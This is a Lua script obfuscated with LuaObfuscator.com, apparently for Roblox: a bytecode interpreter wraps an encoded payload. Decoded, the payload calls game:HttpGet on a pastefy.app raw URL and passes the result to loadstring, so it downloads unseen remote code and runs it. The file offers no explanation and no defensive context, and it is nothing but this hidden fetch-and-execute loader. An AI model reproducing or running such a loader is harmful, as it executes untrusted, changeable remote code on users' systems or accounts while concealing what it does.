--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (0==v82) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v101=v5(v84,v19);v19=nil;return v101;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=0;local v86;while true do if (v85==(0 -0)) then v86=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 67 + 7)))) + 1)) ;return v86-(v86%(569 -((523 -156) + 201))) ;end end else local v87=927 -(214 + 713) ;local v88;while true do if (v87==((1065 -(68 + 997)) + 0)) then v88=2^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1270 -(226 + 1044) ;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==((0 + 0) -0)) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;v35=1;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v41 * ((179527353 -112846522) -49903615)) + (v40 * (66488 -(802 + 150))) + (v39 * 256) + v38 ;end local function v24() local v42=438 -(145 + 293) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 -0)) then v45=(5119 -3632) -(998 + 488) ;v46=(v20(v44,1 + 0 ,1767 -(760 + 987) ) * ((2 + 0)^((2717 -(1789 + 124)) -(201 + 571)))) + v43 ;v42=999 -(915 + 82) ;end if (v42==(5 -3)) then v47=v20(v44,13 + 8 ,31);v48=((v20(v44,41 -9 )==(1188 -(1069 + 118))) and  -1) or (2 -1) ;v42=769 -(745 + 21) ;end if (v42==(6 -(2 + 1))) then if (v47==((0 -0) + 0)) then if (v46==(0 -0)) then return v48 * 0 ;else v47=1 + 0 ;v45=885 -(261 + (2447 -1823)) ;end elseif (v47==(2838 -(368 + 423))) then return ((v46==(1080 -(1020 + 60))) and (v48 * ((3 -2)/(18 -(10 + 8))))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -(24 + 2887)) ) * (v45 + (v46/((444 -(416 + 26))^(165 -113)))) ;end if (v42==(0 + 0 + 0)) then v43=v23();v44=v23();v42=1 -0 ;end end end local function v25(v49) local v50;if  not v49 then local v89=1055 -(87 + 968) ;while true do if (v89==(0 -0)) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v65=1414 -(447 + (2644 -1678)) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0 -0 ;end)();while true do if (v67==(2 -1)) then if ((168 -(122 + 44))==v52) then for v102= #"/",v23() do local v103=(function() return v21();end)();if (v20(v103, #"}", #">")~=0) then else local v121=(function() return 0;end)();local v122=(function() return;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();while true do if (v121~=(3 -1)) then else while true do if (v122== #"\\") then local v173=(function() return 0 -0 ;end)();local v174=(function() return;end)();while true do if (v173==0) then v174=(function() return 0 + 0 ;end)();while true do if (v174==(0 -0)) then v125=(function() return {v22(),v22(),nil,nil};end)();if (v123==(0 -0)) then local v184=(function() return 1251 -(721 + 530) ;end)();local v185=(function() return;end)();while true do if ((1271 -(945 + 326))~=v184) then else v185=(function() return 0;end)();while true do if (v185~=0) then else v125[ #"-19"]=(function() return v22();end)();v125[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v123== #",") then v125[ #"xnx"]=(function() return v23();end)();elseif (v123==(67 -(30 + 35))) then v125[ #"gha"]=(function() return v23() -((2 + 0)^16) ;end)();elseif (v123~= #"nil") then else local v192=(function() return 0 -0 ;end)();local v193=(function() return;end)();while true do if (v192==(0 + 0)) then v193=(function() return 0;end)();while true do if (v193==(700 -(271 + 429))) then v125[ #"xnx"]=(function() return v23() -((5 -3)^(596 -(361 + 219))) ;end)();v125[ #"http"]=(function() return v22();end)();break;end end break;end end end v174=(function() return 1 + 0 ;end)();end if (v174==(1501 -(1408 + 92))) then v122=(function() return 2;end)();break;end end break;end end end if (v122~= #"gha") then else if (v20(v124, #"gha", #"nil")~= #"\\") then else v125[ #".com"]=(function() return v58[v125[ #"asd1"]];end)();end v53[v102]=(function() return v125;end)();break;end if (v122==0) then local v176=(function() return 1086 -(461 + 625) ;end)();while true do if (v176==0) then v123=(function() return v20(v103,1290 -(993 + 295) , #"-19");end)();v124=(function() return v20(v103, #".com",2 + 4 );end)();v176=(function() return 1;end)();end if (v176==1) then v122=(function() return  #"[";end)();break;end end end if (v122~=2) then else local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==(413 -(15 + 398))) then v178=(function() return 0;end)();while true do if (v178==(982 -(18 + 964))) then if (v20(v124, #"<", #".")~= #".") then else v125[1 + 1 ]=(function() return v58[v125[7 -5 ]];end)();end if (v20(v124,1173 -(418 + 753) ,2)== #">") then v125[ #"-19"]=(function() return v58[v125[ #"xxx"]];end)();end v178=(function() return 1;end)();end if (v178==(1 + 0)) then v122=(function() return  #"gha";end)();break;end end break;end end end end break;end if ((1 + 0)==v121) then v124=(function() return nil;end)();v125=(function() return nil;end)();v121=(function() return 1 + 1 ;end)();end if ((0 + 0)==v121) then local v163=(function() return 0 + 0 ;end)();local v164=(function() return;end)();while true do if (v163==0) then v164=(function() return 126 -(116 + 10) ;end)();while true do if (v164~=(0 + 0)) then else v122=(function() return 529 -(406 + 123) ;end)();v123=(function() return nil;end)();v164=(function() return 1;end)();end if (v164~=(1770 -(1749 + 20))) then else v121=(function() return 739 -(542 + 196) ;end)();break;end end break;end end end end end end for v104= #".",v23() do v54[v104-#":" ]=(function() return v28();end)();end return v56;end break;end if ((0 + 0)==v67) then if (v52== #"/") then local v97=(function() return 1322 -(1249 + 73) ;end)();local v98=(function() return;end)();while true do if (v97~=(0 + 0)) then else v98=(function() return 0 + 0 ;end)();while true do if ((4 -2)==v98) then v52=(function() return 2;end)();break;end if (1~=v98) then else for v168= #"}",v57 do local v169=(function() return 1145 -(466 + 679) ;end)();local v170=(function() return;end)();local v171=(function() return;end)();local v172=(function() return;end)();while true do if (v169==(1552 -(1126 + 425))) then v172=(function() return nil;end)();while true do if (v170~=(0 -0)) then else v171=(function() return v21();end)();v172=(function() return nil;end)();v170=(function() return 2 -1 ;end)();end if (v170~=(1901 -(106 + 1794))) then else if (v171== #"|") then v172=(function() return v21()~=(0 + 0) ;end)();elseif (v171==(1 + 1)) then v172=(function() return v24();end)();elseif (v171== #"gha") then v172=(function() return v25();end)();end v58[v168]=(function() return v172;end)();break;end end break;end if (v169==(0 -0)) then local v181=(function() return 0 -0 ;end)();while true do if (1==v181) then v169=(function() return 1122 -(118 + 1003) ;end)();break;end if ((0 -0)~=v181) then else v170=(function() return 0;end)();v171=(function() return nil;end)();v181=(function() return 378 -(142 + 235) ;end)();end end end end end v56[ #"asd"]=(function() return v21();end)();v98=(function() return 9 -7 ;end)();end if (v98~=(0 + 0)) then else v57=(function() return v23();end)();v58=(function() return {};end)();v98=(function() return 978 -(553 + 424) ;end)();end end break;end end end if (v52==(0 -0)) then local v99=(function() return 114 -(4 + 110) ;end)();local v100=(function() return;end)();while true do if (v99==0) then v100=(function() return 584 -(57 + 527) ;end)();while true do if (v100==(1429 -(41 + 1386))) then v52=(function() return  #"{";end)();break;end if (v100==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v100=(function() return 2;end)();end if (v100==(0 + 0)) then v53=(function() return {};end)();v54=(function() return {};end)();v100=(function() return 1;end)();end end break;end end end v67=(function() return 1;end)();end end end end local function v29(v59,v60,v61) local v62=v59[1228 -(322 + 905) ];local v63=v59[2 + 0 ];local v64=v59[2 + 1 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v90=0,v76 do if ((4797>=3895) and (v90>=v70)) then v74[v90-v70 ]=v75[v90 + (2 -1) ];else v78[v90]=v75[v90 + (2 -(1190 -(449 + 740))) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if ((3577==3577) and (v81<=(14 -11))) then if (v81<=((1626 -(826 + 46)) -(239 + 514))) then if ((3794>3693) and (v81==0)) then local v106=0 + 0 ;local v107;local v108;local v109;local v110;local v111;while true do if (v106==((2277 -(245 + 702)) -(797 + 532))) then v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[1 + 1 ]]=v61[v80[6 -3 ]];v72=v72 + ((3801 -2598) -(373 + 829)) ;v80=v68[v72];v106=1 + 1 ;end if (v106==3) then v78[v111 + (732 -(476 + 255)) ]=v110;v78[v111]=v110[v80[1134 -(369 + (2659 -(260 + 1638))) ]];v72=v72 + (441 -(382 + 58)) + (0 -0) ;v80=v68[v72];v78[v80[2 + 0 ]]=v80[5 -2 ];v106=7 -3 ;end if (v106==((504 -260) -(64 + 174))) then v78[v111]=v78[v111](v13(v78,v111 + 1 + 0 ,v73));v72=v72 + (1 -0) ;v80=v68[v72];v78[v80[338 -(144 + 192) ]]();v72=v72 + 1 ;v106=7;end if (v106==(223 -((124 -82) + 174))) then v80=v68[v72];do return;end break;end if (v106==(4 + 1)) then v107=0 + 0 ;for v166=v111,v73 do local v167=0 + 0 ;while true do if (v167==(1504 -(363 + 1141))) then v107=v107 + (1206 -(902 + 303)) ;v78[v166]=v108[v107];break;end end end v72=v72 + 1 ;v80=v68[v72];v111=v80[(3473 -1891) -(1183 + 397) ];v106=18 -12 ;end if (v106==(0 + 0)) then v107=nil;v108,v109=nil;v110=nil;v111=nil;v78[v80[2 + 0 ]]={};v106=1976 -(1913 + 62) ;end if (v106==4) then v72=v72 + 1 + 0 ;v80=v68[v72];v111=v80[2];v108,v109=v71(v78[v111](v13(v78,v111 + (2 -1) ,v80[1936 -(565 + 1368) ])));v73=(v109 + v111) -(3 -2) ;v106=5;end if (v106==(1663 -(1477 + (443 -259)))) then v78[v80[2 -0 ]]=v61[v80[3 + 0 ]];v72=v72 + (857 -(564 + 292)) ;v80=v68[v72];v111=v80[2 -(0 + 0) ];v110=v78[v80[8 -5 ]];v106=3;end end else v78[v80[306 -(244 + 60) ]]();end elseif (v81==(2 + 0)) then local v112=0;local v113;while true do if ((476 -(41 + 435))==v112) then v113=v80[1003 -((2628 -(1121 + 569)) + 63) ];v78[v113]=v78[v113](v13(v78,v113 + (215 -(22 + 192)) ,v73));break;end end else v78[v80[2 + 0 ]]=v61[v80[1128 -(936 + 189) ]];end elseif (v81<=(2 + 3)) then if ((v81==4) or (1275==4100)) then local v116=1613 -(1565 + 48) ;local v117;local v118;while true do if ((v116==(1 + 0)) or (1591>=3580)) then v78[v117 + (1139 -(782 + 356)) ]=v118;v78[v117]=v118[v80[271 -(176 + 91) ]];break;end if ((983<=1808) and (v116==(0 -0))) then v117=v80[2 -0 ];v118=v78[v80[3]];v116=1093 -(975 + 117) ;end end else do return;end end elseif (v81<=(1881 -(157 + 1718))) then v78[v80[2 + 0 ]]=v80[10 -7 ];elseif (v81==(23 -16)) then v78[v80[1020 -(697 + 321) ]]={};else local v127=v80[5 -3 ];local v128,v129=v71(v78[v127](v13(v78,v127 + ((684 -(483 + 200)) -0) ,v80[6 -3 ])));v73=(v129 + v127) -1 ;local v130=0 + 0 ;for v160=v127,v73 do v130=v130 + (1 -0) ;v78[v160]=v128[v130];end end v72=v72 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F386E73465A634B302F72617700099Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
